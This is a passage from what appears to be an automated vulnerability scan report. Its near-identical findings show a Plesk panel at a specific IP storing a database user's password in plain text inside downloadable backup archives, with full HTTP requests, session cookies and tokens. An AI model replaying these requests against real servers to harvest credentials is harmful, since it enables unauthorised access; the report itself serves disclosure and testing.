name=dorky&forgery_protection_token=6d786a85db2c64fc482c76c395bb6516&password=omgitsthepasswd&passwordConfirmation=omgitsthepasswd&hidden=

Response 1

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:40:18 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 02:40:39 GMT
Content-Length: 83

{"redirect":"\/database\/properties\/id\/1","status":"success","statusMessages":[]}

Request 2

GET /plesk/client@1/domain@1/backup/local-repository/item@0x5079bf55ccf6521fb70ce0d4d76cdd2d/download/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0,must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 32765
Content-Type: application/octetstream
Expires: Sat, 19 Nov 2011 21:07:00 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:59 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Content-Disposition: attachment; filename="678585849560ed5afbfdc7dc2e17406_z.xss.cx_info_1111191501.xml.zip"
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:07:01 GMT
Connection: close

PK.........xs?.)...1...1..<...678585849560ed5afbfdc7dc2e17406_z.xss.cx_info_1111191501.xml.....1.......1........1..<?xml version="1.0" encoding="UTF-8"?>
<!-- This is signed plesk backupfile. Any modi
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...

3.10. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x5079bf55ccf6521fb70ce0d4d76cdd2d/download/  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x5079bf55ccf6521fb70ce0d4d76cdd2d/download/

Request 1

POST /smb/database/create-user/databaseId/1 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://50.22.21.242:8443/smb/database/create-user/databaseId/1
Content-Length: 126
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=dashboard
Pragma: no-cache
Cache-Control: no-cache

name=dorky&forgery_protection_token=6d786a85db2c64fc482c76c395bb6516&password=omgitsthepasswd&passwordConfirmation=omgitsthepasswd&hidden=

Response 1

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:40:18 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 02:40:39 GMT
Content-Length: 83

{"redirect":"\/database\/properties\/id\/1","status":"success","statusMessages":[]}

Request 2

GET /plesk/client@1/domain@1/backup/local-repository/item@0x5079bf55ccf6521fb70ce0d4d76cdd2d/download/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0,must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 32765
Content-Type: application/octetstream
Expires: Sat, 19 Nov 2011 21:07:00 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:59 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Content-Disposition: attachment; filename="678585849560ed5afbfdc7dc2e17406_z.xss.cx_info_1111191501.xml.zip"
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:07:01 GMT
Connection: close

PK.........xs?.)...1...1..<...678585849560ed5afbfdc7dc2e17406_z.xss.cx_info_1111191501.xml.....1.......1........1..<?xml version="1.0" encoding="UTF-8"?>
<!-- This is signed plesk backupfile. Any modi
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...

3.11. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x5627defbbf221e4d0b3fa7fa008c2a83/download/  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x5627defbbf221e4d0b3fa7fa008c2a83/download/

Request 1

POST /smb/database/create-user/databaseId/1 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://50.22.21.242:8443/smb/database/create-user/databaseId/1
Content-Length: 126
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=dashboard
Pragma: no-cache
Cache-Control: no-cache

name=dorky&forgery_protection_token=6d786a85db2c64fc482c76c395bb6516&password=omgitsthepasswd&passwordConfirmation=omgitsthepasswd&hidden=

Response 1

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:40:18 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 02:40:39 GMT
Content-Length: 83

{"redirect":"\/database\/properties\/id\/1","status":"success","statusMessages":[]}

Request 2

GET /plesk/client@1/domain@1/backup/local-repository/item@0x5627defbbf221e4d0b3fa7fa008c2a83/download/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0,must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 31541
Content-Type: application/octetstream
Expires: Sat, 19 Nov 2011 21:06:36 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:35 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Content-Disposition: attachment; filename="6785858_z.xss.cx_info_1111191503.xml.zip"
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:36 GMT
Connection: close

PK.........xs?...../.../..$...6785858_z.xss.cx_info_1111191503.xml...../......./......../..<?xml version="1.0" encoding="UTF-8"?>
<!-- This is signed plesk backupfile. Any modification of this file wi
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...

3.12. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x5627defbbf221e4d0b3fa7fa008c2a83/download/  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x5627defbbf221e4d0b3fa7fa008c2a83/download/

Request 1

POST /smb/database/create-user/databaseId/1 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://50.22.21.242:8443/smb/database/create-user/databaseId/1
Content-Length: 126
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=dashboard
Pragma: no-cache
Cache-Control: no-cache

name=dorky&forgery_protection_token=6d786a85db2c64fc482c76c395bb6516&password=omgitsthepasswd&passwordConfirmation=omgitsthepasswd&hidden=

Response 1

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:40:18 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 02:40:39 GMT
Content-Length: 83

{"redirect":"\/database\/properties\/id\/1","status":"success","statusMessages":[]}

Request 2

GET /plesk/client@1/domain@1/backup/local-repository/item@0x5627defbbf221e4d0b3fa7fa008c2a83/download/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0,must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 31541
Content-Type: application/octetstream
Expires: Sat, 19 Nov 2011 21:06:36 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:35 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Content-Disposition: attachment; filename="6785858_z.xss.cx_info_1111191503.xml.zip"
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:36 GMT
Connection: close

PK.........xs?...../.../..$...6785858_z.xss.cx_info_1111191503.xml...../......./......../..<?xml version="1.0" encoding="UTF-8"?>
<!-- This is signed plesk backupfile. Any modification of this file wi
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...

3.13. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x5a764c4aa919d45916a21adb9cd4bc2a/download/  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x5a764c4aa919d45916a21adb9cd4bc2a/download/

Request 1

POST /smb/database/create-user/databaseId/1 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://50.22.21.242:8443/smb/database/create-user/databaseId/1
Content-Length: 126
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=dashboard
Pragma: no-cache
Cache-Control: no-cache

name=dorky&forgery_protection_token=6d786a85db2c64fc482c76c395bb6516&password=omgitsthepasswd&passwordConfirmation=omgitsthepasswd&hidden=

Response 1

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:40:18 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 02:40:39 GMT
Content-Length: 83

{"redirect":"\/database\/properties\/id\/1","status":"success","statusMessages":[]}

Request 2

GET /plesk/client@1/domain@1/backup/local-repository/item@0x5a764c4aa919d45916a21adb9cd4bc2a/download/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0,must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 31541
Content-Type: application/octetstream
Expires: Sat, 19 Nov 2011 21:06:30 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:29 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Content-Disposition: attachment; filename="6785858_z.xss.cx_info_1111191504.xml.zip"
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:30 GMT
Connection: close

PK.........xs?Bx%../.../..$...6785858_z.xss.cx_info_1111191504.xml...../......./......../..<?xml version="1.0" encoding="UTF-8"?>
<!-- This is signed plesk backupfile. Any modification of this file wi
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...

3.14. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x5a764c4aa919d45916a21adb9cd4bc2a/download/  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x5a764c4aa919d45916a21adb9cd4bc2a/download/

Request 1

POST /smb/database/create-user/databaseId/1 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://50.22.21.242:8443/smb/database/create-user/databaseId/1
Content-Length: 126
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=dashboard
Pragma: no-cache
Cache-Control: no-cache

name=dorky&forgery_protection_token=6d786a85db2c64fc482c76c395bb6516&password=omgitsthepasswd&passwordConfirmation=omgitsthepasswd&hidden=

Response 1

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:40:18 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 02:40:39 GMT
Content-Length: 83

{"redirect":"\/database\/properties\/id\/1","status":"success","statusMessages":[]}

Request 2

GET /plesk/client@1/domain@1/backup/local-repository/item@0x5a764c4aa919d45916a21adb9cd4bc2a/download/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0,must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 31541
Content-Type: application/octetstream
Expires: Sat, 19 Nov 2011 21:06:30 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:29 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Content-Disposition: attachment; filename="6785858_z.xss.cx_info_1111191504.xml.zip"
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:30 GMT
Connection: close

PK.........xs?Bx%../.../..$...6785858_z.xss.cx_info_1111191504.xml...../......./......../..<?xml version="1.0" encoding="UTF-8"?>
<!-- This is signed plesk backupfile. Any modification of this file wi
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...

3.15. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x84f3b2f887bd00dae55702ae30c9ac7c/download/  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x84f3b2f887bd00dae55702ae30c9ac7c/download/

Request 1

POST /smb/database/create-user/databaseId/1 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://50.22.21.242:8443/smb/database/create-user/databaseId/1
Content-Length: 126
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=dashboard
Pragma: no-cache
Cache-Control: no-cache

name=dorky&forgery_protection_token=6d786a85db2c64fc482c76c395bb6516&password=omgitsthepasswd&passwordConfirmation=omgitsthepasswd&hidden=

Response 1

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:40:18 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 02:40:39 GMT
Content-Length: 83

{"redirect":"\/database\/properties\/id\/1","status":"success","statusMessages":[]}

Request 2

GET /plesk/client@1/domain@1/backup/local-repository/item@0x84f3b2f887bd00dae55702ae30c9ac7c/download/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0,must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 31853
Content-Type: application/octetstream
Expires: Sat, 19 Nov 2011 21:06:33 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:32 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Content-Disposition: attachment; filename="6785858_z.xss.cx_info_1111191459.xml.zip"
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:33 GMT
Connection: close

PK.........xs?<.5y./.../..$...6785858_z.xss.cx_info_1111191459.xml...../......./......../..<?xml version="1.0" encoding="UTF-8"?>
<!-- This is signed plesk backupfile. Any modification of this file wi
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...

3.16. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x84f3b2f887bd00dae55702ae30c9ac7c/download/  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x84f3b2f887bd00dae55702ae30c9ac7c/download/

Request 1

POST /smb/database/create-user/databaseId/1 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://50.22.21.242:8443/smb/database/create-user/databaseId/1
Content-Length: 126
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=dashboard
Pragma: no-cache
Cache-Control: no-cache

name=dorky&forgery_protection_token=6d786a85db2c64fc482c76c395bb6516&password=omgitsthepasswd&passwordConfirmation=omgitsthepasswd&hidden=

Response 1

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:40:18 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 02:40:39 GMT
Content-Length: 83

{"redirect":"\/database\/properties\/id\/1","status":"success","statusMessages":[]}

Request 2

GET /plesk/client@1/domain@1/backup/local-repository/item@0x84f3b2f887bd00dae55702ae30c9ac7c/download/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0,must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 31853
Content-Type: application/octetstream
Expires: Sat, 19 Nov 2011 21:06:33 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:32 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Content-Disposition: attachment; filename="6785858_z.xss.cx_info_1111191459.xml.zip"
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:33 GMT
Connection: close

PK.........xs?<.5y./.../..$...6785858_z.xss.cx_info_1111191459.xml...../......./......../..<?xml version="1.0" encoding="UTF-8"?>
<!-- This is signed plesk backupfile. Any modification of this file wi
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...

3.17. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x926b8ec323bf6361f0a0a01ecfc62f15/download/  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x926b8ec323bf6361f0a0a01ecfc62f15/download/

Request 1

POST /smb/database/create-user/databaseId/1 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://50.22.21.242:8443/smb/database/create-user/databaseId/1
Content-Length: 126
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=dashboard
Pragma: no-cache
Cache-Control: no-cache

name=dorky&forgery_protection_token=6d786a85db2c64fc482c76c395bb6516&password=omgitsthepasswd&passwordConfirmation=omgitsthepasswd&hidden=

Response 1

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:40:18 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
